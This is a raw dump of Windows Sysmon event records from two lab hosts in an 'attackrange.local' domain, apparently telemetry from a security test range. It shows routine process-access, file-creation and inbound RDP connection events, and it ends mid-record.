09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.251{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.251{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:01.396{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCDE03EDC0A84C1F7A089CBEA4B26C90,SHA256=4BD2BC826600527C8255E74168D1DB23FEFD589BE50B5926DFA9A7DCA34434DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:01.305{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:01.280{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:01.204{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9|C:\Program Files\Mozilla Firefox\xul.dll+39647b 23542300x80000000000000001051458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:02.584{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76EF844B5B94C240C9B957F64984BA31,SHA256=B160939D7E1860BFD7BC6309D242EC5F022ED2697DDE2F68C5B47F297A9DD06B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979885Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:02.099{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68E30A33B61C96130848A1FEFB5AF922,SHA256=FC9597C2C43E26ED8D60A27748F0C598710FB3F3494DE1200ED3190639606F88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:03.813{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F140CCA9FB9F04294F61F455ED42D380,SHA256=84AD4EEC60DBB264F1135D0AF0A665EB3C4A5E7540E556F9C93A5164A00529B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979886Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:03.101{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C830F5919A25F924BB0F057EDA6BE36,SHA256=F12EA6C43C00AD9B73E68CA4B38C4804C0A637F7B757EEE2DBFD4FC081A1EA7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.844{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01744E64E28AB1E87D31D7E1F1BA217A,SHA256=F5F29D9AA887F3A1D33062267AE5D89C2D0FEE2EC1B8D1BB897AE87517514F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979890Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:04.304{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68554FB65E8E7C816201154315C4DE5C,SHA256=736840C1D1BCFC04ECAC9FCD0519F6B443D6C9A8ED2010B51CD27E83B1E6F297,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979889Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:01.351{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54395-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001051465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.349{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-walMD5=DAE4D1E34D0992A41962A22CED86EC8D,SHA256=E24C83FC1EFEFE98BE3C4BEFD67B90602F265D164A1509D5B63F85D5603F4DD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.346{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-shmMD5=83955C812BC7ECEFD6A08A38448C2665,SHA256=25577D1D46F3F158444251FCA70C65E177CFCBB339152A12B4C1889E7CE72722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.335{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=CB073655EE344195786F4E6F5D951555,SHA256=1A1BC337EDBA844D50220A11DF12D31FC342048BCE47234CBFF02A7EA4B7218A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.311{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++www.google.com\ls\usageMD5=841561654ABAC21517A0DCE8690ADFE6,SHA256=3441CDDA8D8CD052F850786ADD6D022CD73AACB1E581F5A305E5D3DDA35ED458,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.075{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\5816MD5=0F9C728C7CA5AD7277C546EC37982194,SHA256=E0749139CA0608E2626BC44992478042008FCC06ED98106D655A5323E6D8D9CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.053{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\permissions.sqlite-journalMD5=E711837C4471A7DB86B3931A4AD521D9,SHA256=4E5A8B3F9D91F83D84543ACA542696975CF350B37542910EE9428BC192B30078,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979888Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:04.038{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A69E749C9D581216205AA2CAE02D0DA,SHA256=6FC378158A0DE68A2265DAE6302C6BC876D70E687269A8C219457AC2A7DDA117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979887Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:04.038{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAAFE2EFFCF396F5234D68FE4F80570B,SHA256=74CE1C6C86C1724F0A346D4AA20E46EFF6BBE2C4D7399EBFC09B06C1F507DEED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:05.849{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BBE422DF3D37F690DA7A0A8C9E0D3BF,SHA256=65B38D27B6B883B0D18D54244420358F56D72EDB0CEDA18D217E89EC091BCB9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979892Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:05.991{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A69E749C9D581216205AA2CAE02D0DA,SHA256=6FC378158A0DE68A2265DAE6302C6BC876D70E687269A8C219457AC2A7DDA117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979891Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:05.304{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBA028FF8103C2513BF7FC1FF0D0C73B,SHA256=91B274842F32B5889DD9C92307B383FE53937D3A2884C2C6E42512F653D0ECD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:04.708{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53454-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:06.852{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F671170E037D9CAD918FAF0CDC1F825,SHA256=B5EE604637F651533F26F6D3B23D80F9C6E62DE59A364EE2978110F804FA41A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979896Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:06.398{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD78E07A5A6DDAE88F542D2675A44FE,SHA256=B3299EAC3D6FACA8AD858D973F5298661BE4D94A62E7849AB4DDB5BD45657F93,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979895Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:02.186{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com36316-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979894Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:02.108{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49671-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979893Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:01.851{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59446-false10.0.1.12-8000- 23542300x80000000000000001051470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:07.857{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F9A69B21BF32A6D0996CB92BBD0604,SHA256=515B7ED7F8BA1596582AB992A62DF6FD5B28A3AE853E2C87B7EAC4488EC8BE73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979897Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:07.585{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8712EBE09E1BB457A37F3E69013D8E95,SHA256=2C12B0DD1A1844B0D1B5B4D7DAB3BDC093C2C96FB77066B416385F785700901A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:07.014{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com44346-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:06.762{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51793-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:08.868{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=404F934C204798D3DB9E7D1E6E640399,SHA256=8F8B1BF146A924270637129D118E9DB148064B76F253D40CD57B4B316F07B603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979900Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:08.741{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C95B03B7459FC73E15A7DF708B4CF8C,SHA256=012C7745F7C5E4E9724EC7376A0F36B31F0145B9405AE5A994C1946885D73A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:08.408{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F8DBBED37490C44D12592A3127BBF00,SHA256=BFCEFF542BCA39C09B4F9CE5E4CBFCA3C676FCC5C602CF68298D59D265DC1181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 